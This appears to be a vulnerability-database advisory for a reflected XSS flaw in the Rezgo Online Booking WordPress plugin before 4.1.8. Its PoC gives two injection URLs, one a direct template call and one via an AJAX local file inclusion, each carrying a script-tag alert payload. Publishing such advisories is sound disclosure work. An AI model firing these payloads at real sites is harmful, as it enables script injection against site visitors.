Lucene search

K
wpvulndbCydaveWPVDB-ID:005C2300-F6BD-416E-97A6-D42284BBB093
HistoryJul 26, 2022 - 12:00 a.m.

Rezgo Online Booking < 4.1.8 - Reflected Cross-Site-Scripting

2022-07-2600:00:00
cydave
wpscan.com
5
rezgo online booking
reflected cross-site-scripting
plugin vulnerability
sanitisation
ajax action
direct call

EPSS

0.001

Percentile

40.2%

The plugin does not sanitise and escape some parameters before outputting them back in a page, leading to a Reflected Cross-Site Scripting, which can be exploited either via a LFI in an AJAX action, or direct call to the affected file

PoC

Direct call: https://example.com/wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags="><script>alert(`xss`)</script> Via the LFI: Once the plugin is configured (can use a dummy “Rezgo Company Code” and “Rezgo API Key” in the “Acccount Information” settings section): http://example.com/wp-admin/admin-ajax.php?action=rezgo&amp;method;=rezgo/templates/default/frame_header&amp;tags;="><script>alert(`xss`)</script>

EPSS

0.001

Percentile

40.2%

Related for WPVDB-ID:005C2300-F6BD-416E-97A6-D42284BBB093